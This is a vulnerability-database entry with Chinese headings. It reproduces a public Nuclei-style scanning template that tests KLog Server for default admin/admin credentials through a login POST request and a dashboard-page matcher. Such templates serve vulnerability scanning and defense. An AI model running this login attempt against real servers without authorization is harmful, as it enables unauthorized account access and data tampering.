漏洞描述
KLog Server contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
klog-server-default-login: KLog Server - Default Login
PoC代码[已公开]
id: klog-server-default-login
info:
name: KLog Server - Default Login
author: s4e-io
severity: high
description: |
KLog Server contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.klogserver.com/
metadata:
max-request: 2
vendor: klogserver
product: klog_server
tags: default-login,klog-server,vuln
http:
- raw:
- |
POST /actions/entree.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pswd={{password}}&action=login
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<title>KLog Server", "ADMIN", "Dashboard")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100e4ed7381abc3a6c484e65737558efec02de32cd48319287e0c18669833fb8348022100ce00f4802ac6b214a1f2fb15f6c3b7ff85fd0000aed34d00b3a918c5f6ae5a3a:922c64590222798bb761d5b6d8e72950